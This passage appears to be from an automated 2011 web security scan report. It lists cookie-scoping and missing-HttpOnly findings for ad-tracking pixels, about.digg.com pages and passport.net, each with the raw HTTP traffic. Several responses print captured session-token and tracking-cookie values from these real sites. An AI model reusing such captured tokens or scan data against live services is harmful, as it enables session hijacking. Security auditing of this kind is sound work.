Zg8KCZRGV3wwYzaym5HRxmYPCgmURld8MGM2spuR0cbb0sPsXWgw_x9D6jnx5LK_2BhDosUowXxXmwB90G1tj9gYQ6LFKMF8V5sAfdBtbY_YGEOixSjBfFebAH3QbW2GhE7gFloT4X513bbUoowJpoRO4BZaE-F-dd221KKMCaaETuAWWhPhfnXdttSijAmjoFfr6E7AtWKXcAv7zPgNhKraltt_znEUtPzey_YSNRSq2pbbf85xFLT83sv2EjUUqtqW23_OcRS0_N7L9hI1Fz-QUXxY9m0RT2v_0PtAEz3vMJW6Nolrhqx2yRbBnwHeM8DMgjvm5t97BtYytOx4Rqhj3O8p-XR3nA6DvXKpTl; fc=NPwnTj55SxablmgxgOU6YvTAau0fxQm9Ss2FVtOc0fRwe2fiMiJstcorldPAQEWsjtR00WuVUesotFeF8b0iqzTwskhjzr5X5fLnW2Y1L8oWeSZAoSqfzCTWGJqSVzUxwmWj6rOwJQbNe1FGkQ72Mr3ZyRv0KSWu8UtGn86vdZZ2Bxw8hDOLkguYqml5zW-MINBiIQ09VuaB6H4kNZ3jvWDXo_Ub5NvFSqNxsTqhNOEJzdGEYQUbYRsENlG1EkxlHr-vpMpIww2oeMaNqJcAGNVCVYgScgvT-7lnf3tWEtoI26ZIhO_EYD2Jv5etTb7nPXORZ_ihz3v_EDqUfBGd38kaFp7wmgHwSln4BB0aAU-Y-fE6mCrmAAKxJpNINZh0gYrE3U6bhGdZv_0Ofvauqo02tkR5MgBK5U8r1oXGHyKLM2r82BMAlsOE4kKakojRElg7FxL2FmmNWsvuLk3EV1Ob1kR0cv3Vim-wWYu2PuOaPtJF5zGBev3l88f3V44c; pf=imLa8Y9K7y9JWjvDp9rzLXdg786oafP5T-2J8P9-MbRqAdtWEIdLx553uOXwyk_d7lMV6ku5x6Fs62Dm_QelJC3HNez-Z8pMdla1M14yZ1aXhaLn0WGDkLMH4cxWtxtJnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB_k59seAzgg1-n2fcjLvpOMi9tA_b87Jqn_e3gK2wczGx_CWj995ZG4J9ayZG8Azab13_ic6bm3qPlYluqL2y0jaU-Oqt1gdom4zJIFfDwZ9PMXsV2RPLlXKhVOkCzWSAMHy8NkV9GlxOD5jcadlcpoFV-_N4_TQoIGyiXOJHiskWx1ZATf6jr6V7CCyVFok1rG6pyhUqm2FHzEiDJ6sf-pacXWwno-sBBfZi85NtW5Qt-_BHDFm96AL-Hlvz6iB4BqpqgoK--2Z8dYtNlLNE0_IPCGGg4JuduY91z0-G9PFEs00MFyErnctvH2BT73d3_FZBD7b-KShsGHFtw-PJccEMxwAG8SoEVS9m9Zd2vmWErUUgLCw4NxIwxNfjDRkuTL2j5Yg93F_QOtFzYyWOePChv1i2naEiRm-G40oRJBGTBpVCc0qMQ7XSXeQvsWsjFHiMSxf4LuiqRb7JIEpKg8kby9cY_1mRgRy-7Zp8tzhfOiqJ0pMkyWUtj3tCfqb_tGZRzNBjxRhmI6dM4mbZKOYU4-nV0UYeEGUxF1S_oHu4hFkzr5r4tc43qm6cSueuRO2hVcsSqb840lbAIGS9ubZxGaNUCyMdwNgf2avKHVNnolOOu7jj76mTVAdA_mdYfmHtPNZuqI_jxiXxEOs5H0vlfIlKbmfHqHUcP5b-IIns1zek1KJ0W2qXBTetRtqOYNCGSsyjP4AXt3T9RPBVkJDNnxwnTaHhSt6_M966_yDGRntkal431Er-D6EvQQXSzw07Q7-ZTvu6ltuMBngQyhlUXNT1Hb5nCH2u9H8JYL2vqi7ZcubYPjdCiTEvC6ixvxWnBAvvN4YHBYs623Zfp7mYinN8F-xomiNBADxpAVRXj30kPclrBAUX47luAB61FeciHDtDUZA6oDA9lgECWxePb1qgK2wydMqKon7gU_K8C3sxgZqLnqGwdljDWk8V-5saTK0J9MhEtW2SZi442SAJJiCcWe8XmAo-ZeIFD11aDlRV7nM6V6_zFKpP7wlLYQPKIschJVNwDZdXQ9qmKL_Qbi_JfgEHW4reZkqoXAIHtX_b9gyna0u7aW5BDNIqsWhukbMM8brSoTtnUG56p5TJB44WFzdjkM-mROp9OOL7FDQ7cHkGLYBuqZ3lgWaipiAFXhGx2dqcch-VuzoEikRXiOR4xaxbvDpaqAiEb8VhvKcFx-ovh4Sl88FoBqgf0tyxN9W-kw0R4q9C5CmY2JUjJXnRD7WzNJZ_sCBAgpM1TWvCRlVZFXXZnqNPukYr_L3KLsKcRyxoRdaMovUBfTNEPRSKFgtbcbx8BqX90ZQQcpEfWqJMVmEBPEAIGejpPCFWKz3O59OPx58buvJ_uvNLcUoXM2ObJkBpZIBDJKm2ziC3HJIl0BWgLsB3Xb9sspub1VzehZ-dnjQrUAX1RWz23DJ4AN2p3Bkps3nmT_CyZOWO0K6AmyoJJ0WVqwfHJmkvMMecgZzynLsGgRc_i10bzP3aegk4VhMUbe1DPDoRajStMsbCQClj0a4aNFYQ33AhPyEf_pRhJLMk6r38S9EXL7rx5ntmq24iXH1baYIQ5WA9IExVRwqhQKkb2ecnJ-2UOQj0PVB__QK20iFxmMrBi_Ozk9p2lUUv6L37oAr_AV6d2dHRLCHQNMiRthyWEMiVlxcMdEeKLokMX7jcq64dIsZNbiFzVInJ14TCwCQ9fqReykA8qBRaCLn3AdbjtskBuPk60M0N683DQsE4ZC-hxMORC22isekOI2V75sPw5QLpTHbDx3qmiChRuhkT71jvR1w1cjNDo5Itf_BvoKeVF3ZR9-1s7QiDoMPUY-ZVqhnCeQMjDTZrbWEsRIvXQWcM2EqCJfHKFgH6ShjUTMi6Fy8HuTX3hHZqIyshrEm0-qlU6GLKu8GfLpkN0bDQNM4p86wye9uBqQI4_fI7zC0JJ2DuRXGxP-2g9_CgYuY8pN_VrecGDh6UwTrru9GLmwxbidN1AUdQybKB4VyjEokVAfrO6zFP7ekqOUhJzASYimudaJc-nqwrLqeBidwfS-yH1nGi3UeGqKb9R2O8_f7i8ovAE8EZ8c3EpZGfdvY3YmYKNPM3iO16JJWQBvkviQa82CG4NkuHuK5hHF8F4pZHDyRRzEoRhIsHjaFVUhglHsoi-_gue4Y9GYFWcPlXqN1LcUW2PklnchprXEhv3r7HtHIEvOa8bUpKMjK8lg77zJlCabEdFr8zLsnvY_jhe-w8LS7NnrSfPrT7_ys5OYzXfKqxN9PqlPQO7yAyIRqyycyKA8i0F3zIMbv5tUub_jys2KG-DoXTNzLTlHYmH8wMN_undN9fZc-pI0Ny4hubjOBUf2DQSm9Ohj3B7jgP9CCqG8Wt-ubVX90wI71XdOFbmuO_nu7xzWg1owdmgiD4haU31wETkVUs2IUBSWSwU9HuGqutvFVd-RPEMlRmI-tk5XQOBLE3hkIaiREQLK5qM9EX44AOJlvs8DYm-_z8wtr-sIKH6L02PQc77v8w4KeUWdpWld1cOt5B9y5dzZtTu3JqKGLAN1pzcD0dPfCuBK65VIPkK5kWZct35sO1Zn7pXWDz9pp4ib7xIdhf9zRg7pMNE_CJ40sHgFesrKS-sIOtZ0uWaFVuInERcUbOl0hZVWfZ4IPC39oh4ISFoEomPNyVVtSZY1RAo6Ssw0gNhdaAh0ubUxGmkN2fgVgehhyd0pky1b6ARNsIvyharCLLEFwpnlzXrhrzzYYv8tbnjLz1Zdsb_zZj1IfqS_aLZsRx-RLssOEi8Ic52I1SwSEzv1L7Xgy2Eldwn0osGTLllLrxdLGKvBbatPkttpJfAXFMB_81ZZqVp19l6yq--kytbvLV02MMBRF8QbYmkHZ9XZAHAsEZLsmJUb3ppXhtS9nRt7KX5Xvit0JJ8VmH7pEBcCAAwb_dsSSirzOYOWSpt9tKo6CdsoHgH6aru4Y4C1Oo_U7A4BsmBGEA7E6lGoeN4cYQLBhIGU78mY0O1B84kcRbagcEY3bvKO4WENO-4Aup8ydwoW1LAK5lzDCZf66Ro0bevR-FWOxJFZXHpkSB-wiy2euPF1s93pcsDAmXOMvRijJwI3i6Kr-KRd8-6tGKt3Z8Sx3Gwu4SNfNZ4Dc9CPpihH8V5KiSx-wwNBb6P5; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C1%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005%7C12%7C1006%7C1007%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15153%7C15153%7C15156%7C15151%7C15153%7C15153%7C15156%7C15146%7C15156%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15156%7C15153%7C15153%7C15149%7C15153%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15153; rv=1; uid=4325897289836481830

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/
Set-Cookie: rrs=3%7C6%7C9%7C12%7C1002%7C1005%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C18%7C2%7C5%7C1001%7C1004%7C1007; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/
Set-Cookie: rds=15156%7C15153%7C15156%7C15156%7C15161%7C15153%7C15149%7C15146%7C15151%7C15156%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/
Location: http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/
Content-Length: 0
Date: Wed, 06 Jul 2011 11:21:55 GMT


9.41. http://rs.gwallet.com/r1/pixel/x1094  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x1094

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x1094?r1s=enJsne_2xin_W0gqpJPdDOiRtZgEH_OufcvtkeNI5aQ HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=i4-b510-7K0-e5r0-I3r0; ra1_sid=3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://tag.admeld.com/pixel?admeld_adprovider_id=553&_radium=0
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1


9.42. http://rs.gwallet.com/r1/pixel/x1225  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x1225

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x1225?r1s=OUPv0729NeoDz8CeIHHoYeiRtZgEH_OufcvtkeNI5aQ HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=i4-b510-7K0-e5r0-I3r0; ra1_sid=3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://bstats.adbrite.com/adserver/behavioral-data/0?d=48272602;bapid=12553;uid=1030306;neg=1
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1


9.43. http://rs.gwallet.com/r1/pixel/x368  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x368

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x368 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=S4-740-e5b0-I3b0; ra1_sid=3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://rs.gwallet.com/r1/pixel/x1094?r1s=enJsne_2xin_W0gqpJPdDOiRtZgEH_OufcvtkeNI5aQ
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1


9.44. http://rs.gwallet.com/r1/pixel/x369  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x369

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x369 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=S4-740-e5b0-I3b0; ra1_sid=3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://rs.gwallet.com/r1/pixel/x1225?r1s=OUPv0729NeoDz8CeIHHoYeiRtZgEH_OufcvtkeNI5aQ
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1


10. Cookie without HttpOnly flag set  previous  next
There are 73 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



10.1. http://about.digg.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=96839786b8fdb7818a75089363be3cac; expires=Fri, 29-Jul-2011 14:54:34 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17973


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.2. http://about.digg.com/ads  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /ads

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=8d9cb78aa1d77381647579b491d16261; expires=Fri, 29-Jul-2011 14:54:34 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 7213
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.3. http://about.digg.com/blog  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /blog

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blog HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=d3bd911c4412a5f105a30b014982aaed; expires=Fri, 29-Jul-2011 14:54:36 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15614


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.4. http://about.digg.com/contact  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /contact

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=183f9d06f7faf23f4425f2bca06ffba5; expires=Fri, 29-Jul-2011 14:54:36 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 7886
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.5. http://about.digg.com/faq  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /faq

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /faq HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=2eb23705fdf587154cd28b12c4d39ae6; expires=Fri, 29-Jul-2011 14:54:36 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25290


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.6. http://about.digg.com/partnership  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /partnership

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partnership HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=81512413a75972f559239632a17b7d62; expires=Fri, 29-Jul-2011 14:54:35 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8103


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.7. http://about.digg.com/privacy  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /privacy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=5dae80891524c3f10a5dd8dcaee38263; expires=Fri, 29-Jul-2011 14:54:37 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16757


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.8. http://about.digg.com/terms-use  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /terms-use

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /terms-use HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=790163a5d0bb3c66f0901f4df9eaeead; expires=Fri, 29-Jul-2011 14:54:37 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24783


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.9. https://accountservices.passport.net/gethip.srf  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://accountservices.passport.net
Path:   /gethip.srf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gethip.srf?lc=1033&fid=2044200945&id=75046&fre=hard&type=visual HTTP/1.1
Host: accountservices.passport.net
Connection: keep-alive
Referer: https://accountservices.passport.net/uiresetpw.srf?mkt=EN-US&lc=1033&id=75046
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
